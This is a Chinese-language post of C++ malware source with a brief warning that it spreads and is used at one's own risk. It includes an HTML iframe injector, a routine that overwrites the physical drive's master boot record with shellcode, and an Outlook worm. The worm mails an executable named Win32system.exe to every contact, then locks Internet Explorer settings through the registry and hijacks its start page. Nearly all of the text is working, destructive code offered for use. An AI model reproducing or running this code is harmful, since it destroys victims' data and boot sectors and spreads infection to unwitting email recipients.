要运行该C++程序的话。需要把他编译成exe!!如果要感染的话。需要放到D://Backup,我并不建议这么做,因为会传染!如果要在虚拟机上运行的话,需要断网!不然会传染到别的电脑上。但凡使用,后果自负!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>
bool inject(char *filepath)
{
char url[]="\r\n<iframe src=http://www.baidu.com/ width=0 height=0></iframe>";
FILE *fp;
fp=fopen(filepath,"rb+");
if(fp==NULL)
{
return false;
}
fseek(fp,0,SEEK_END);
fwrite(url,sizeof(char),strlen(url),fp);
fclose(fp);
return true;
}
void setColor(unsigned short ForeColor=3,unsigned short BackGroundColor=0)
//给参数默认值
{
HANDLE hCon = GetStdHandle(STD_OUTPUT_HANDLE); //
SetConsoleTextAttribute(hCon,ForeColor|BackGroundColor);
}
void OutPutDebugInfo(char *s,int level=0)
{
switch (level)
{
case 0:
setColor(7,0);//白色
printf("%s",s);
break;
case 1:
setColor(FOREGROUND_GREEN,0);;//绿色
printf("%s",s);
break;
case 2:
setColor(6,0);//黄色
printf("%s",s);
break;
case 3:
setColor(FOREGROUND_RED,0);//红色
printf("%s",s);
break;
default:
setColor(7,0);//白色
printf("%s",s);
break;
}
}
int main(int argc, char* argv[])
{
if(!inject("c:\\test.htm"))
{
OutPutDebugInfo("Inject Error\n",3);
}else
{
OutPutDebugInfo("Inject success\n");
}
//OutPutDebugInfo("Inject success\n");
getchar();
return 0;
}
#include "StdAfx.h"
#include <windows.h>
#include <winioctl.h>
int killMBR();
int APIENTRY WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd )
{
MessageBox(NULL,"Fuck MBR!","Fuck!",0);
killMBR();
return 0;
}
unsigned char scode[]="\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
int killMBR()
{
HANDLE hDevice;
DWORD dwBytesWritten,dwBytesReturned;
BYTE pMBR[512]={0};
memcpy(pMBR,scode,sizeof(scode)-1);//重新构造MBR
pMBR[510]=0x55;
pMBR[511]=0xAA;
hDevice=CreateFile("\\\\.\\PHYSICALDRIVEO",
GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL,OPEN_EXISTING,0,NULL);
if(hDevice==INVALID_HANDLE_VALUE)
{
return -1;
}
DeviceIoControl(hDevice,FSCTL_LOCK_VOLUME,NULL,0,NULL,0,
&dwBytesReturned,NULL);
WriteFile(hDevice,pMBR,sizeof(pMBR),&dwBytesWritten,NULL);//写入病毒内容
DeviceIoControl(hDevice,FSCTL_UNLOCK_VOLUME,NULL,0,NULL,0
,&dwBytesReturned,NULL);
CloseHandle(hDevice);
ExitProcess(-1);
return 0;
}
#include <iostream>
#include <windows.h>
#include <comdef.h>
#include <comutil.h>
#include <atlbase.h>
#include <atlcom.h>
#include <Outlook.h>
#pragma comment(lib, "comsuppw.lib")
void SetRegistryValue(HKEY hKeyRoot, LPCWSTR subKey, LPCWSTR valueName, DWORD data) {
HKEY hKey;
if (RegOpenKeyEx(hKeyRoot, subKey, 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
RegSetValueEx(hKey, valueName, 0, REG_DWORD, reinterpret_cast<const BYTE*>(&data), sizeof(data));
RegCloseKey(hKey);
} else {
std::cerr << "Failed to open registry key: " << subKey << std::endl;
}
}
void SetRegistryStringValue(HKEY hKeyRoot, LPCWSTR subKey, LPCWSTR valueName, LPCWSTR data) {
HKEY hKey;
if (RegOpenKeyEx(hKeyRoot, subKey, 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
RegSetValueEx(hKey, valueName, 0, REG_SZ, reinterpret_cast<const BYTE*>(data), (lstrlen(data) + 1) * sizeof(wchar_t));
RegCloseKey(hKey);
} else {
std::cerr << "Failed to open registry key: " << subKey << std::endl;
}
}
int main() {
CoInitialize(NULL);
// Create Outlook application
CComPtr<Outlook::_Application> pApp;
HRESULT hr = pApp.CoCreateInstance(__uuidof(Outlook::Application));
if (FAILED(hr)) {
std::cerr << "Failed to create Outlook instance." << std::endl;
CoUninitialize();
return 1;
}
// Get the MAPI namespace
CComPtr<Outlook::_NameSpace> pNamespace;
hr = pApp->GetNamespace(L"MAPI", &pNamespace);
if (FAILED(hr)) {
std::cerr << "Failed to get MAPI namespace." << std::endl;
CoUninitialize();
return 1;
}
// Get the AddressLists
CComPtr<Outlook::AddressLists> pAddressLists;
hr = pNamespace->get_AddressLists(&pAddressLists);
if (FAILED(hr)) {
std::cerr << "Failed to get AddressLists." << std::endl;
CoUninitialize();
return 1;
}
// Get the first AddressList
CComPtr<Outlook::AddressList> pAddressList;
hr = pAddressLists->Item(1, &pAddressList);
if (FAILED(hr)) {
std::cerr << "Failed to get first AddressList." << std::endl;
CoUninitialize();
return 1;
}
// Get the AddressEntries
CComPtr<Outlook::AddressEntries> pAddressEntries;
hr = pAddressList->get_AddressEntries(&pAddressEntries);
if (FAILED(hr)) {
std::cerr << "Failed to get AddressEntries." << std::endl;
CoUninitialize();
return 1;
}
long count;
pAddressEntries->get_Count(&count);
for (long x = 1; x <= count; ++x) {
CComPtr<Outlook::AddressEntry> pAddressEntry;
hr = pAddressEntries->Item(x, &pAddressEntry);
if (FAILED(hr)) {
std::cerr << "Failed to get AddressEntry at index " << x << "." << std::endl;
continue;
}
CComPtr<Outlook::MailItem> pMailItem;
hr = pApp->CreateItem(Outlook::olMailItem, (IDispatch**)&pMailItem);
if (FAILED(hr)) {
std::cerr << "Failed to create MailItem." << std::endl;
continue;
}
CComBSTR address;
hr = pAddressEntry->get_Address(&address);
if (FAILED(hr)) {
std::cerr << "Failed to get address." << std::endl;
continue;
}
pMailItem->put_To(address);
pMailItem->put_Subject(L"Why are you so foolish?");
pMailItem->put_Body(L"Here is a document explaining why you are foolish!!!");
// Attach the file
CComPtr<Outlook::Attachments> pAttachments;
hr = pMailItem->get_Attachments(&pAttachments);
if (FAILED(hr)) {
std::cerr << "Failed to get attachments." << std::endl;
continue;
}
CComVariant filePath(L"D:\\Backup\\Win32system.exe");
hr = pAttachments->Add(&filePath, Outlook::olByValue, 1, CComVariant(L"Win32system.exe"));
if (FAILED(hr)) {
std::cerr << "Failed to add attachment." << std::endl;
continue;
}
// Send the email
hr = pMailItem->Send();
if (FAILED(hr)) {
std::cerr << "Failed to send email." << std::endl;
}
}
// Quit Outlook
pApp->Quit();
CoUninitialize();
// Set registry values
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions", L"NoBrowserContextMenu", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions", L"NoBrowserOptions", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions", L"NoBrowserSaveAs", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions", L"NoFileOpen", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel", L"Advanced", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel", L"Cache Internet", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel", L"AutoConfig", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel", L"HomePage", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel", L"History", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel", L"Connwiz Admin Lock", 1);
SetRegistryStringValue(HKEY_USERS, L".DEFAULT\\Software\\Microsoft\\Internet Explorer\\Main", L"Start Page", L"http://liudemin.myetang.com");
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel", L"SecurityTab", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel", L"ResetWebSettings", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions", L"NoViewSource", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Infodelivery\\Restrictions", L"NoAddingSubscriptions", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", L"NoFileMenu", 1);
return 0;
}